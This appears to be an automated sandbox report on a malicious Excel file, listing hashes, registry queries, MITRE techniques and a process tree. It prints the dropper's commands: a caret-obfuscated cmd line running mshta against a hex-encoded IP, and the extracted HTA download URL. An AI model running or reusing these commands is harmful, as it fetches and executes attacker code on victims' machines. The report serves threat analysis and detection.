aacf84eae39e69f30102eb3bd92a25231fd6a4aa5383e3cb1576234b6764b825

General

Target

aacf84eae39e69f30102eb3bd92a25231fd6a4aa5383e3cb1576234b6764b825.xls
Size

142KB
MD5

a1dd00cea711f5908071a51f80af933c
SHA1

bbbf2e794c8de4dd7dcec1076263528f7a6f0105
SHA256

aacf84eae39e69f30102eb3bd92a25231fd6a4aa5383e3cb1576234b6764b825
SHA512

b9b902f66e5c8b900e186d75fce0c1ca1a091118411dff7e463219a1194434f3794552146122583cc8003d9685e62dcced2c608e16d8f977d4e16053043b1d7b
SSDEEP

3072:4Rk3hbdlylKsgqopeJBWhZFGkE+cL2NdAlhEvN8B/W6X1yxYovrepMUdQ6gSz4iq:Qk3hbdlylKsgqopeJBWhZFVE+W2NdAli

Score

10^/10

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

http://185.7.214.7/fer/fer.html

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	2136	4236	cmd.exe	81

Blocklisted process makes network request 1 IoCs

flow	pid	Process
24	756	mshta.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
4236	EXCEL.EXE

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
4236	EXCEL.EXE
4236	EXCEL.EXE

Suspicious use of SetWindowsHookEx 12 IoCs

pid	Process
4236	EXCEL.EXE
4236	EXCEL.EXE
4236	EXCEL.EXE
4236	EXCEL.EXE
4236	EXCEL.EXE
4236	EXCEL.EXE
4236	EXCEL.EXE
4236	EXCEL.EXE
4236	EXCEL.EXE
4236	EXCEL.EXE
4236	EXCEL.EXE
4236	EXCEL.EXE

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 4236 wrote to memory of 1436	4236	EXCEL.EXE	84
PID 4236 wrote to memory of 1436	4236	EXCEL.EXE	84
PID 4236 wrote to memory of 2136	4236	EXCEL.EXE	90
PID 4236 wrote to memory of 2136	4236	EXCEL.EXE	90
PID 2136 wrote to memory of 756	2136	cmd.exe	92
PID 2136 wrote to memory of 756	2136	cmd.exe	92

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\aacf84eae39e69f30102eb3bd92a25231fd6a4aa5383e3cb1576234b6764b825.xls"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4236
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:1436
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fer.html
  2⤵
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  PID:2136
- - C:\Windows\system32\mshta.exe
    mshta http://0xb907d607/fer/fer.html
    3⤵
    - Blocklisted process makes network request
    PID:756

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc
1⤵
PID:4520

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

Filesize
3KB

MD5
1bbae7ef694c302942477e5f88465e48

SHA1
02351283aa410ff3619f2fcbde2e0cc344798f26

SHA256
005d6046648fb8119827f520a7c6303fcdfcecbc9fb94dfe1ee18850b29da1b5

SHA512
2643c5f9e30f74716d88b8a7385c5f27bac43feb034ea06b1622bbe8f3b65c69857b9d18250001a7b8d97424311e4b71d1af0303007065532814c2deb9742fd0

Download Submit
memory/4236-11-0x00007FFA3A950000-0x00007FFA3A960000-memory.dmp

Filesize
64KB

Download
memory/4236-13-0x00007FFA7C930000-0x00007FFA7CB25000-memory.dmp

Filesize
2.0MB

Download
memory/4236-3-0x00007FFA3C9B0000-0x00007FFA3C9C0000-memory.dmp

Filesize
64KB

Download
memory/4236-6-0x00007FFA7C930000-0x00007FFA7CB25000-memory.dmp

Filesize
2.0MB

Download
memory/4236-7-0x00007FFA3C9B0000-0x00007FFA3C9C0000-memory.dmp

Filesize
64KB

Download
memory/4236-8-0x00007FFA7C930000-0x00007FFA7CB25000-memory.dmp

Filesize
2.0MB

Download
memory/4236-5-0x00007FFA7C930000-0x00007FFA7CB25000-memory.dmp

Filesize
2.0MB

Download
memory/4236-4-0x00007FFA3C9B0000-0x00007FFA3C9C0000-memory.dmp

Filesize
64KB

Download
memory/4236-10-0x00007FFA7C930000-0x00007FFA7CB25000-memory.dmp

Filesize
2.0MB

Download
memory/4236-15-0x00007FFA7C930000-0x00007FFA7CB25000-memory.dmp

Filesize
2.0MB

Download
memory/4236-2-0x00007FFA3C9B0000-0x00007FFA3C9C0000-memory.dmp

Filesize
64KB

Download
memory/4236-9-0x00007FFA7C930000-0x00007FFA7CB25000-memory.dmp

Filesize
2.0MB

Download
memory/4236-1-0x00007FFA3C9B0000-0x00007FFA3C9C0000-memory.dmp

Filesize
64KB

Download
memory/4236-16-0x00007FFA7C930000-0x00007FFA7CB25000-memory.dmp

Filesize
2.0MB

Download
memory/4236-14-0x00007FFA7C930000-0x00007FFA7CB25000-memory.dmp

Filesize
2.0MB

Download
memory/4236-12-0x00007FFA7C930000-0x00007FFA7CB25000-memory.dmp

Filesize
2.0MB

Download
memory/4236-17-0x00007FFA3A950000-0x00007FFA3A960000-memory.dmp

Filesize
64KB

Download
memory/4236-28-0x00007FFA7C9CD000-0x00007FFA7C9CE000-memory.dmp

Filesize
4KB

Download
memory/4236-29-0x00007FFA7C930000-0x00007FFA7CB25000-memory.dmp

Filesize
2.0MB

Download
memory/4236-30-0x00007FFA7C930000-0x00007FFA7CB25000-memory.dmp

Filesize
2.0MB

Download
memory/4236-31-0x00007FFA7C930000-0x00007FFA7CB25000-memory.dmp

Filesize
2.0MB

Download
memory/4236-0-0x00007FFA7C9CD000-0x00007FFA7C9CE000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads